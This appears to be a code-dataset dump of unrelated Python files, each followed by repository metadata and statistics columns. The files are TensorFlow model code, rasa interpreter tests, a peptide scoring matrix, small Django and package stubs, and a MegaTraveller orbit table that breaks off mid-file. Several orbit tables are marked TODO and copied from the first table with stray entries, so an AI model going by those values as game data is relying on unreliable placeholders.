h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv',pad="VALID_NOPAD"))
# # 8x8x256
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['feat2'] = feat2
def __init__(self, df_dim=64, batch_momentum=0.9, arch='arch1', archs=archs, ckpt=None):
"""
Args:
df_dim: Number of filters in the first layer. Doubled with each following layer.
momentum: Parameter for momentum in batch normalization.
arch: Name of architecture to be used
batch_size: Number of samples per batch
"""
self.df_dim = df_dim
self.batch_momentum = batch_momentum
self.arch = arch
self.archs = archs
self.ckpt = ckpt
self.conv_dict={}
if self.ckpt is not None and self.arch == 'feat1' or self.arch == 'feat1A':
checkpoint = tf.train.latest_checkpoint(self.ckpt)
path_to_meta = glob(os.path.join(self.ckpt,'*.meta'))
self.saver = tf.train.import_meta_graph(path_to_meta[0])
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.9)
self.sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
self.saver.restore(self.sess,checkpoint)
self.graph = self.sess.graph
self.conv_dict['w0'] = self.graph.get_tensor_by_name('discriminator/d_h0_conv/w:0')
self.conv_dict['w1'] = self.graph.get_tensor_by_name('discriminator/d_h1_conv/w:0')
self.conv_dict['w2'] = self.graph.get_tensor_by_name('discriminator/d_h2_conv/w:0')
self.conv_dict['b0'] = self.graph.get_tensor_by_name('discriminator/d_h0_conv/biases:0')
self.conv_dict['b1'] = self.graph.get_tensor_by_name('discriminator/d_h1_conv/biases:0')
self.conv_dict['b2'] = self.graph.get_tensor_by_name('discriminator/d_h2_conv/biases:0')
self.conv_dict['s1'] = self.graph.get_tensor_by_name('discriminator/d_h1_IN/scale:0')
self.conv_dict['s2'] = self.graph.get_tensor_by_name('discriminator/d_h2_IN/scale:0')
self.conv_dict['o1'] = self.graph.get_tensor_by_name('discriminator/d_h1_IN/offset:0')
self.conv_dict['o2'] = self.graph.get_tensor_by_name('discriminator/d_h2_IN/offset:0')
# print(tf.get_default_graph().get_all_collection_keys())
# self.df_dim = self.graph.get_tensor_by_name('discriminator/d_h0_conv/w:0').shape[-1]
def get_output(self, image, reuse=False, is_training=True, bn=False, bs=64, image_semSeg=None):
params = {'activation': tf.nn.relu, 'padding': 'same',
'batch_normalization': bn, 'entropy': 'sigmoid', 'batch_size': bs,
'sem_seg': image_semSeg}
return self.archs[self.arch](self, image, reuse=reuse, is_training=is_training, params=params)
| 53.952941 | 176 | 0.581286 | 7,076 | 41,274 | 3.153477 | 0.041266 | 0.039437 | 0.053643 | 0.016671 | 0.842744 | 0.826925 | 0.808551 | 0.804159 | 0.792955 | 0.783544 | 0 | 0.084154 | 0.254325 | 41,274 | 764 | 177 | 54.02356 | 0.640868 | 0.077894 | 0 | 0.635838 | 0 | 0.001927 | 0.079856 | 0.007767 | 0 | 0 | 0 | 0 | 0.044316 | 1 | 0.063584 | false | 0 | 0.013487 | 0.00578 | 0.142582 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dc7665eddfb7f1b8b555782fe341b8569a52f730 | 2,801 | py | Python | tests/shared/nlu/test_interpreter.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 37 | 2019-06-07T07:39:00.000Z | 2022-01-27T08:32:57.000Z | tests/shared/nlu/test_interpreter.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 216 | 2020-09-20T13:05:58.000Z | 2022-03-28T12:10:24.000Z | tests/shared/nlu/test_interpreter.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 65 | 2019-05-21T12:16:53.000Z | 2022-02-23T10:54:15.000Z | import pytest
from rasa.shared.constants import INTENT_MESSAGE_PREFIX
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.shared.nlu.interpreter import RegexInterpreter
async def test_regex_interpreter_intent():
text = INTENT_MESSAGE_PREFIX + "my_intent"
result = await RegexInterpreter().parse(text)
assert result["text"] == text
assert len(result["intent_ranking"]) == 1
assert (
result["intent"][INTENT_NAME_KEY]
== result["intent_ranking"][0][INTENT_NAME_KEY]
== "my_intent"
)
assert (
result["intent"]["confidence"]
== result["intent_ranking"][0]["confidence"]
== pytest.approx(1.0)
)
assert len(result["entities"]) == 0
async def test_regex_interpreter_entities():
text = INTENT_MESSAGE_PREFIX + 'my_intent{"foo":"bar"}'
result = await RegexInterpreter().parse(text)
assert result["text"] == text
assert len(result["intent_ranking"]) == 1
assert (
result["intent"][INTENT_NAME_KEY]
== result["intent_ranking"][0][INTENT_NAME_KEY]
== "my_intent"
)
assert (
result["intent"]["confidence"]
== result["intent_ranking"][0]["confidence"]
== pytest.approx(1.0)
)
assert len(result["entities"]) == 1
assert result["entities"][0]["entity"] == "foo"
assert result["entities"][0]["value"] == "bar"
async def test_regex_interpreter_confidence():
text = INTENT_MESSAGE_PREFIX + "my_intent@0.5"
result = await RegexInterpreter().parse(text)
assert result["text"] == text
assert len(result["intent_ranking"]) == 1
assert (
result["intent"][INTENT_NAME_KEY]
== result["intent_ranking"][0][INTENT_NAME_KEY]
== "my_intent"
)
assert (
result["intent"]["confidence"]
== result["intent_ranking"][0]["confidence"]
== pytest.approx(0.5)
)
assert len(result["entities"]) == 0
async def test_regex_interpreter_confidence_and_entities():
text = INTENT_MESSAGE_PREFIX + 'my_intent@0.5{"foo":"bar"}'
result = await RegexInterpreter().parse(text)
assert result["text"] == text
assert len(result["intent_ranking"]) == 1
assert (
result["intent"][INTENT_NAME_KEY]
== result["intent_ranking"][0][INTENT_NAME_KEY]
== "my_intent"
)
assert (
result["intent"]["confidence"]
== result["intent_ranking"][0]["confidence"]
== pytest.approx(0.5)
)
assert len(result["entities"]) == 1
assert result["entities"][0]["entity"] == "foo"
assert result["entities"][0]["value"] == "bar"
async def test_regex_interpreter_adds_intent_prefix():
r = await RegexInterpreter().parse('mood_greet{"name": "rasa"}')
assert r.get("text") == '/mood_greet{"name": "rasa"}'
| 32.195402 | 68 | 0.631917 | 324 | 2,801 | 5.25 | 0.12963 | 0.141093 | 0.134039 | 0.094062 | 0.850088 | 0.833627 | 0.803645 | 0.776014 | 0.737213 | 0.737213 | 0 | 0.014369 | 0.204927 | 2,801 | 86 | 69 | 32.569767 | 0.749439 | 0 | 0 | 0.693333 | 0 | 0 | 0.20457 | 0.017137 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | false | 0 | 0.053333 | 0 | 0.053333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dc826a76a6c0b483e26d8cdb24f8e6d3d7bfb617 | 2,816 | py | Python | epytope/Data/pssms/smmpmbec/mat/A_11_01_11.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smmpmbec/mat/A_11_01_11.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smmpmbec/mat/A_11_01_11.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | A_11_01_11 = {0: {'A': -0.386, 'C': 0.102, 'E': 0.077, 'D': 0.168, 'G': -0.151, 'F': 0.722, 'I': 0.425, 'H': -0.387, 'K': -0.334, 'M': 0.123, 'L': 0.271, 'N': -0.063, 'Q': 0.001, 'P': 0.279, 'S': -0.752, 'R': -0.316, 'T': -0.507, 'W': 0.364, 'V': -0.16, 'Y': 0.523}, 1: {'A': -0.56, 'C': 0.583, 'E': 0.367, 'D': 0.06, 'G': -0.107, 'F': 0.074, 'I': -0.435, 'H': 0.423, 'K': 0.346, 'M': -0.272, 'L': -0.122, 'N': 0.073, 'Q': -0.026, 'P': -0.056, 'S': -0.561, 'R': 0.777, 'T': -0.628, 'W': 0.304, 'V': -0.634, 'Y': 0.394}, 2: {'A': -0.08, 'C': -0.065, 'E': 0.073, 'D': 0.026, 'G': -0.007, 'F': -0.347, 'I': -0.067, 'H': 0.012, 'K': -0.133, 'M': 0.068, 'L': 0.057, 'N': 0.13, 'Q': 0.376, 'P': 0.265, 'S': 0.11, 'R': -0.04, 'T': 0.054, 'W': -0.076, 'V': -0.097, 'Y': -0.258}, 3: {'A': 0.027, 'C': -0.033, 'E': 0.003, 'D': 0.065, 'G': 0.122, 'F': -0.246, 'I': -0.014, 'H': -0.056, 'K': 0.306, 'M': 0.006, 'L': -0.035, 'N': -0.071, 'Q': -0.004, 'P': -0.181, 'S': 0.087, 'R': 0.268, 'T': -0.012, 'W': -0.064, 'V': -0.02, 'Y': -0.147}, 4: {'A': 0.01, 'C': -0.023, 'E': -0.031, 'D': -0.034, 'G': -0.015, 'F': -0.028, 'I': 0.043, 'H': -0.011, 'K': 0.037, 'M': 0.027, 'L': 0.046, 'N': -0.006, 'Q': 0.008, 'P': -0.044, 'S': 0.002, 'R': -0.001, 'T': 0.016, 'W': -0.019, 'V': 0.059, 'Y': -0.035}, 5: {'A': -0.126, 'C': -0.023, 'E': 0.031, 'D': 0.048, 'G': -0.017, 'F': 0.044, 'I': 0.022, 'H': 0.038, 'K': 0.089, 'M': 0.055, 'L': 0.039, 'N': 0.037, 'Q': -0.053, 'P': -0.047, 'S': -0.111, 'R': 0.128, 'T': -0.183, 'W': 0.062, 'V': -0.107, 'Y': 0.074}, 6: {'A': 0.021, 'C': 0.001, 'E': 0.002, 'D': 0.001, 'G': 0.024, 'F': 0.011, 'I': -0.032, 'H': 0.007, 'K': -0.015, 'M': 0.009, 'L': 0.012, 'N': 0.009, 'Q': 0.01, 'P': -0.016, 'S': 0.011, 'R': -0.002, 'T': -0.014, 'W': -0.012, 'V': -0.021, 'Y': -0.005}, 7: {'A': 0.112, 'C': -0.005, 'E': -0.007, 'D': 0.015, 'G': 0.059, 'F': -0.1, 'I': -0.132, 'H': 0.0, 'K': -0.016, 'M': -0.052, 'L': -0.066, 'N': -0.024, 'Q': 0.071, 'P': 0.171, 'S': 0.1, 'R': 0.028, 'T': 0.069, 'W': -0.073, 'V': -0.068, 'Y': -0.081}, 8: {'A': 0.898, 'C': 0.079, 'E': 0.199, 'D': -0.028, 'G': 0.12, 'F': -0.556, 'I': -0.034, 'H': -0.339, 'K': -0.177, 'M': -0.247, 'L': 0.098, 'N': 0.065, 'Q': 0.075, 'P': 0.476, 'S': 0.08, 'R': -0.059, 'T': -0.182, 'W': -0.397, 'V': 0.452, 'Y': -0.523}, 9: {'A': 0.562, 'C': -0.094, 'E': -0.02, 'D': -0.031, 'G': 0.183, 'F': -0.536, 'I': -0.058, 'H': 0.304, 'K': -0.218, 'M': -0.017, 'L': 0.047, 'N': 0.269, 'Q': 0.295, 'P': 0.13, 'S': 0.419, 'R': -0.691, 'T': 0.553, 'W': -0.71, 'V': 0.255, 'Y': -0.643}, 10: {'A': -0.036, 'C': 0.142, 'E': 0.117, 'D': 0.099, 'G': -0.118, 'F': 0.291, 'I': 0.347, 'H': -0.309, 'K': -1.188, 'M': 0.343, 'L': 0.301, 'N': 0.034, 'Q': -0.219, 'P': -0.137, 'S': -0.053, 'R': -0.721, 'T': 0.141, 'W': 0.448, 'V': 0.463, 'Y': 0.055}, -1: {'con': 4.0985}} | 2,816 | 2,816 | 0.394176 | 679 | 2,816 | 1.630339 | 0.282769 | 0.019874 | 0.009033 | 0.01084 | 0.02168 | 0.02168 | 0.02168 | 0.02168 | 0 | 0 | 0 | 0.373994 | 0.161577 | 2,816 | 1 | 2,816 | 2,816 | 0.094875 | 0 | 0 | 0 | 0 | 0 | 0.079162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dca235729293cce7c882ec9f72c00b0b537ec201 | 37 | py | Python | work/simple_des_y3_sims/simple_des_y3_sims_mcal/__init__.py | beckermr/misc | da8fed310a0c99d7a5a10a1bfa74aac4db676475 | [
"BSD-3-Clause"
] | 2 | 2020-06-30T21:08:08.000Z | 2020-07-01T02:46:34.000Z | work/simple_des_y3_sims/simple_des_y3_sims_mcal/__init__.py | beckermr/misc | da8fed310a0c99d7a5a10a1bfa74aac4db676475 | [
"BSD-3-Clause"
] | null | null | null | work/simple_des_y3_sims/simple_des_y3_sims_mcal/__init__.py | beckermr/misc | da8fed310a0c99d7a5a10a1bfa74aac4db676475 | [
"BSD-3-Clause"
] | 1 | 2020-04-18T04:10:47.000Z | 2020-04-18T04:10:47.000Z | from .run_it import run_mcal # noqa
| 18.5 | 36 | 0.756757 | 7 | 37 | 3.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 37 | 1 | 37 | 37 | 0.866667 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f4930b27edda74cf81bc2aad9bd4b8e6217b16d7 | 73 | py | Python | example/simpleapp/widgets.py | callowayproject/django-stories | ea0398d69ea597819d0a6c75d4a3f65820321e13 | [
"Apache-2.0"
] | 10 | 2015-06-25T23:35:29.000Z | 2021-08-20T04:22:00.000Z | example/simpleapp/widgets.py | callowayproject/django-stories | ea0398d69ea597819d0a6c75d4a3f65820321e13 | [
"Apache-2.0"
] | null | null | null | example/simpleapp/widgets.py | callowayproject/django-stories | ea0398d69ea597819d0a6c75d4a3f65820321e13 | [
"Apache-2.0"
] | 2 | 2017-03-21T04:10:29.000Z | 2020-04-06T12:38:12.000Z | from django import forms
class CustomTextarea(forms.Textarea):
pass
| 14.6 | 37 | 0.780822 | 9 | 73 | 6.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 73 | 4 | 38 | 18.25 | 0.934426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f4db607f475ed651b7a41686c16f1c205800da07 | 192 | py | Python | src/MCQ/models/__init__.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | [
"Apache-2.0"
] | null | null | null | src/MCQ/models/__init__.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | [
"Apache-2.0"
] | null | null | null | src/MCQ/models/__init__.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | [
"Apache-2.0"
] | 1 | 2020-11-23T09:13:58.000Z | 2020-11-23T09:13:58.000Z | from .InceptAC import ActorCritic as InceptAC
from .Transformer import PolicyTransformer, ValueTransformer
from .ActorCritic import ActorCritic
from .GumbelActorCritic import GumbelActorCritic | 48 | 60 | 0.880208 | 19 | 192 | 8.894737 | 0.473684 | 0.201183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 192 | 4 | 61 | 48 | 0.971264 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f4ede4e144135850df4c651eab844f7634f7bec2 | 33 | py | Python | plugins/permalinks/__init__.py | mohnjahoney/website_source | edc86a869b90ae604f32e736d9d5ecd918088e6a | [
"MIT"
] | 13 | 2020-01-27T09:02:25.000Z | 2022-01-20T07:45:26.000Z | plugins/permalinks/__init__.py | mohnjahoney/website_source | edc86a869b90ae604f32e736d9d5ecd918088e6a | [
"MIT"
] | 29 | 2020-03-22T06:57:57.000Z | 2022-01-24T22:46:42.000Z | plugins/permalinks/__init__.py | mohnjahoney/website_source | edc86a869b90ae604f32e736d9d5ecd918088e6a | [
"MIT"
] | 6 | 2020-07-10T00:13:30.000Z | 2022-01-26T08:22:33.000Z | from .permalinks import register
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
762135fbaaba11c66c626818a3cc2487a89936d3 | 11,207 | py | Python | code/Orbits.py | Penultimate-Panacea/MegaTraveller-Referee-Companion | b3f54288e5e105579fa763b1c96372b2fe6416a4 | [
"Unlicense"
] | null | null | null | code/Orbits.py | Penultimate-Panacea/MegaTraveller-Referee-Companion | b3f54288e5e105579fa763b1c96372b2fe6416a4 | [
"Unlicense"
] | null | null | null | code/Orbits.py | Penultimate-Panacea/MegaTraveller-Referee-Companion | b3f54288e5e105579fa763b1c96372b2fe6416a4 | [
"Unlicense"
] | null | null | null | class OrbitTable:
# - is inside star, I is inner, H is habitable, O is outer, _ is incinerated, S is the star itself
table_00 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_01 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_02 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_03 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_04 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_05 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "O", "O", "O"]
table_06 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_07 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_08 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_09 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_0A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_0B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_0C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_0 = [table_00, table_01, table_02, table_03, table_04, table_05, table_06, table_07, table_08, table_09,
table_0A, table_0B, table_0C]
table_10 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_11 = ["S", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O"]
table_12 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O"]
table_13 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_14 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_15 = ["S", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_16 = ["S", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_17 = ["S", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_18 = ["S", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_19 = ["S", "-", "-", "-", "-", "_", "I", "I", "I", "I", "H", "H", "O", "O", "O"]
table_1A = ["S", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O", "O"]
table_1B = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "H", "O", "O"]
table_1C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "H", "H", "O", "O"]
table_1 = [table_10, table_11, table_12, table_13, table_14, table_15, table_16, table_17, table_18, table_19,
table_1A, table_1B, table_1C]
# ABOVE COMPLETE TODO BELOW:
table_20 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "O", "H", "O"]
table_21 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "I", "I", "O", "O", "O"]
table_22 = ["S", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O"]
table_23 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_24 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_25 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_26 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_27 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_28 = ["S", "_", "I", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O"]
table_29 = ["S", "-", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O"]
table_2A = ["S", "-", "-", "-", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_2B = ["S", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "H", "O", "O"]
table_2C = ["S", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "H", "O", "O"]
table_2 = [table_20, table_21, table_22, table_23, table_24, table_25, table_26, table_27, table_28, table_29,
table_2A, table_2B, table_2C]
table_30 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_31 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_32 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_33 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_34 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_35 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_36 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_37 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_38 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_39 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_3A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_3B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_3C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_3 = [table_30, table_31, table_32, table_33, table_34, table_35, table_36, table_37, table_38, table_39,
table_3A, table_3B, table_3C]
table_40 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_41 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_42 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_43 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_44 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_45 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_46 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_47 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_48 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_49 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_4A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_4B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_4C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_4 = [table_40, table_41, table_42, table_43, table_44, table_45, table_46, table_47, table_48, table_49,
table_4A, table_4B, table_4C]
table_50 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_51 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_52 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_53 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_54 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_55 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_56 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_57 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_58 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_59 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_5A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_5B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_5C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_5 = [table_50, table_51, table_52, table_53, table_54, table_55, table_56, table_57, table_58, table_59,
table_5A, table_5B, table_5C]
table_60 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_61 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_62 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_63 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_64 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_65 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_66 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_67 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_68 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_69 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_6A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_6B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
